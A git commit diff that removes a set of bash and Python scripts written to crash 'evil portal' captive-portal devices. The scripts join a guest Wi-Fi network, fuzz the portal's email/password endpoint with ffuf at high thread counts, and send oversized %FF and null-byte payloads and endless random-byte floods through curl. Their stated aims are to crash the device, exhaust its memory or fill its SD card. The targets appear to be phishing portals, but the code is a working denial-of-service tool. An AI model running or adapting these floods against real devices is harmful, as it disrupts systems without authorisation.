boopedeboop
This commit is contained in:
@@ -1,23 +0,0 @@
|
||||
#!/bin/bash
|
||||
wifi_device=wlan1
|
||||
ssid=Guest-WiFi
|
||||
host="192.168.4.1"
|
||||
|
||||
wordlist=/usr/share/wordlists/seclists/Fuzzing/6-digits-000000-999999.txt
|
||||
|
||||
sudo nmcli d disconnect $wifi_device > /dev/null
|
||||
|
||||
sudo nmcli dev wifi rescan > /dev/null
|
||||
|
||||
echo -e "\nCashing This Evil Portal With No Survivors\n"
|
||||
|
||||
sudo nmcli device wifi connect $ssid ifname $wifi_device
|
||||
|
||||
echo -e "\nSending Over 9000 Requests...\nSpamming Until It Errors\n"
|
||||
|
||||
ffuf -w $wordlist -u "http://${host}/get?email=FUZZ&password=FUZZ" -fc all -s -sa -t 256 -timeout 3
|
||||
|
||||
echo -e "\n\nPinging To Confirm Kill...\n"
|
||||
ping -c 4 $host
|
||||
|
||||
echo -e "\nThat Was Big Payload (4U)\nRIP"
|
||||
@@ -1,18 +0,0 @@
|
||||
import subprocess
|
||||
|
||||
# host = "http://192.168.4.1"
|
||||
host = "http://10.0.0.80"
|
||||
charlen = 2000
|
||||
char = "%FF"
|
||||
|
||||
curl_cmd = "curl --silent"
|
||||
|
||||
payload = char*charlen
|
||||
uri = f"{host}/get.php?email={payload}&password={payload}"
|
||||
command = f"{curl_cmd} '{uri}'"
|
||||
print(f"\nCrashing This Evil Portal With No Survivors Using: {charlen} {char}s\n")
|
||||
p = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True)
|
||||
(output, err) = p.communicate()
|
||||
p_status = p.wait()
|
||||
|
||||
print("That's A Big Load (4U)\n\nDone")
|
||||
@@ -1,23 +0,0 @@
|
||||
#!/bin/bash
|
||||
wifi_device=wlan1
|
||||
ssid=Guest-WiFi
|
||||
host="192.168.4.1"
|
||||
|
||||
wordlist=/usr/share/wordlists/seclists/Fuzzing/6-digits-000000-999999.txt
|
||||
|
||||
sudo nmcli d disconnect $wifi_device > /dev/null
|
||||
|
||||
sudo nmcli dev wifi rescan > /dev/null
|
||||
|
||||
echo -e "\nCashing This Evil Portal With No Survivors\n"
|
||||
|
||||
sudo nmcli device wifi connect $ssid ifname $wifi_device
|
||||
|
||||
echo -e "\nSending Over 9000 Requests...\nSpamming Until It Errors\n"
|
||||
|
||||
ffuf -w $wordlist -u "http://${host}/get?email=FUZZ&password=FUZZ" -fc all -s -sa -t 256 -timeout 3
|
||||
|
||||
echo -e "\n\nPinging To Confirm Kill...\n"
|
||||
ping -c 4 $host
|
||||
|
||||
echo -e "\nThat Was Big Payload (4U)\nRIP"
|
||||
@@ -1,40 +0,0 @@
|
||||
import datetime
|
||||
import subprocess
|
||||
import time
|
||||
|
||||
# host = "10.0.0.80"
|
||||
host = "192.168.4.1"
|
||||
|
||||
rangei = 65536 # FFFF+1
|
||||
|
||||
currenttime = datetime.datetime.now()
|
||||
datestamp = currenttime.strftime("%d%m%Y-%H.%M.%S")
|
||||
|
||||
for x in range(rangei):
|
||||
hexcode = hex(x)[2:]
|
||||
if x > 255:
|
||||
urlformatted_raw = "%{:04x}".format(x)
|
||||
hexformatted_raw = "0x{:04x}".format(x)
|
||||
urlformatted = f"{urlformatted_raw[:3]}%{urlformatted_raw[3:]}"
|
||||
else:
|
||||
urlformatted_raw = "%{:04x}".format(x)
|
||||
urlformatted = "%{:02x}".format(x)
|
||||
hexformatted = "0x{:02x}".format(x)
|
||||
unicode_formatted = "%u{:04x}".format(x)
|
||||
printformatted = f"\\x{hexcode}"
|
||||
|
||||
print(f"Running {urlformatted} and {urlformatted_raw} and {unicode_formatted}")
|
||||
p = subprocess.Popen(f"curl -i -s -S 'http://{host}/get?email=email{urlformatted}email&password=password{urlformatted}password' >> fuzzing-results/urlformatted-{rangei}-{datestamp}.txt", stdout=subprocess.PIPE, shell=True)
|
||||
p1 = subprocess.Popen(f"curl -i -s -S 'http://{host}/get?email=email{urlformatted_raw}email&password=password{urlformatted_raw}password' >> fuzzing-results/urlformatted_raw-{rangei}-{datestamp}.txt", stdout=subprocess.PIPE, shell=True)
|
||||
p2 = subprocess.Popen(f"curl -i -s -S 'http://{host}/get?email=email{unicode_formatted}email&password=password{unicode_formatted}password' >> fuzzing-results/unicode_formatted-{rangei}-{datestamp}.txt", stdout=subprocess.PIPE, shell=True)
|
||||
|
||||
(output, err) = p.communicate()
|
||||
(output, err) = p1.communicate()
|
||||
(output, err) = p2.communicate()
|
||||
|
||||
p_status = p.wait()
|
||||
p_status1 = p1.wait()
|
||||
p_status2 = p2.wait()
|
||||
|
||||
time.sleep(0.225)
|
||||
print(f"\n\nlog written to fuzzing-results/X-{rangei}-{datestamp}.txt")
|
||||
@@ -1,43 +0,0 @@
|
||||
import datetime
|
||||
import subprocess
|
||||
import time
|
||||
|
||||
# host = "http://10.0.0.80"
|
||||
# host = "http://192.168.4.1"
|
||||
host = "http://172.0.0.1"
|
||||
charlen = 750
|
||||
char = "%00%FF"
|
||||
prepend = ""
|
||||
append = ""
|
||||
|
||||
currenttime = datetime.datetime.now()
|
||||
datestamp = currenttime.strftime("%d%m%Y-%H.%M.%S")
|
||||
|
||||
outfile = f"fuzzing-results/hex-sniper-rifle-{datestamp}.txt"
|
||||
|
||||
# -i, --include - include header in output
|
||||
# -I, --head - HEAD http method
|
||||
# -s, --silent - supresses progress and errors
|
||||
# -S, --show-error - when used with -s/--silent, displays errors
|
||||
# -D <file>, --dump-header <file> - saves response headers to <file>
|
||||
# -f, --fail - fail silently on HTTP error
|
||||
# -X, --request - request method, defaults to GET
|
||||
# -H <header:value>, --header <header:value> - sets header, multiple are allowed
|
||||
# -v, --verbose - show request headers
|
||||
# -o <file>, --output <file> - write output to file
|
||||
|
||||
# curl_cmd = "curl -i -s -S -v"
|
||||
curl_cmd = "curl --include --silent --show-error"
|
||||
|
||||
chars = char*charlen
|
||||
payload = f"{prepend}{chars}{append}"
|
||||
uri = f"{host}/get.php?email={payload}&password=holdstill"
|
||||
command = f"{curl_cmd} '{uri}' >> {outfile}"
|
||||
print(f"\n\nRunning {char}*{charlen} on email\nPrepend: {prepend}\nAppend: {append}\nOutfile: {outfile}")
|
||||
with open(outfile, "a") as log:
|
||||
log.write(f"\n\nChars: {char}*{charlen} - Prepend: {prepend} - Append: {append}\n")
|
||||
p = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True)
|
||||
(output, err) = p.communicate()
|
||||
p_status = p.wait()
|
||||
|
||||
print(f"\n\nlog written to {outfile}")
|
||||
@@ -1,46 +0,0 @@
|
||||
import datetime
|
||||
import subprocess
|
||||
import time
|
||||
|
||||
# host = "http://10.0.0.80"
|
||||
# host = "http://192.168.4.1"
|
||||
host = "http://172.0.0.1"
|
||||
rangei = 10000
|
||||
char = "%00%FF"
|
||||
# char = "%00"
|
||||
prepend = ""
|
||||
append = ""
|
||||
#append = "%0a%00%0a"
|
||||
|
||||
currenttime = datetime.datetime.now()
|
||||
datestamp = currenttime.strftime("%d%m%Y-%H.%M.%S")
|
||||
|
||||
outfile = f"fuzzing-results/chars-{rangei}-{datestamp}.txt"
|
||||
|
||||
# -i, --include - include header in output
|
||||
# -I, --head - HEAD http method
|
||||
# -s, --silent - supresses progress and errors
|
||||
# -S, --show-error - when used with -s/--silent, displays errors
|
||||
# -D <file>, --dump-header <file> - saves response headers to <file>
|
||||
# -f, --fail - fail silently on HTTP error
|
||||
# -X, --request - request method, defaults to GET
|
||||
# -H <header:value>, --header <header:value> - sets header, multiple are allowed
|
||||
# -v, --verbose - show request headers
|
||||
# -o <file>, --output <file> - write output to file
|
||||
|
||||
# curl_cmd = "curl -i -s -S -v"
|
||||
curl_cmd = "curl --include --silent --show-error"
|
||||
|
||||
for x in range(rangei+1):
|
||||
chars = char*x
|
||||
payload = f"{prepend}{chars}{append}"
|
||||
uri = f"{host}/get?email={payload}&password={payload}"
|
||||
command = f"{curl_cmd} '{uri}' >> {outfile}"
|
||||
print(f"Running {x}/{rangei} chars ({char})\n\tPrepend: {prepend}\n\tAppend: {append}\nOutfile: {outfile}\n")
|
||||
with open(outfile, "a") as log:
|
||||
log.write(f"\n\n{x}/{rangei} - Char: {char} - Prepend: {prepend} - Append: {append}\n")
|
||||
p = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True)
|
||||
(output, err) = p.communicate()
|
||||
p_status = p.wait()
|
||||
|
||||
print(f"\n\nlog written to {outfile}")
|
||||
@@ -1 +0,0 @@
|
||||
bash connect-wifi && python sd-card-murder.py
|
||||
@@ -1,29 +0,0 @@
|
||||
import subprocess
|
||||
import os
|
||||
# from requests.utils import requote_uri
|
||||
import urllib.parse
|
||||
from random import randbytes
|
||||
|
||||
# host = "http://192.168.4.1" # cyd version
|
||||
host = "http://172.0.0.1" # flipper version
|
||||
# host = "http://10.0.0.80"
|
||||
# rangei = 10000
|
||||
# charlen = 2012 # to crash
|
||||
charlen = 1400 # to flood flipper mem(?)
|
||||
# charlen = 700 # to flood filesysted
|
||||
curl_cmd = "curl --include --silent --show-error"
|
||||
|
||||
x = 0
|
||||
#for x in range(rangei+1):
|
||||
while True:
|
||||
payload = urllib.parse.quote(randbytes(charlen))
|
||||
uri = f"{host}/get?email={payload}&password={payload}"
|
||||
command = f"{curl_cmd} '{uri}'"
|
||||
|
||||
print(f"{x} of infinite sets of {charlen} random bytes")
|
||||
p = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True)
|
||||
(output, err) = p.communicate()
|
||||
p_status = p.wait()
|
||||
x=x+1
|
||||
|
||||
print(f"\n\nThe End")
|
||||
Reference in New Issue
Block a user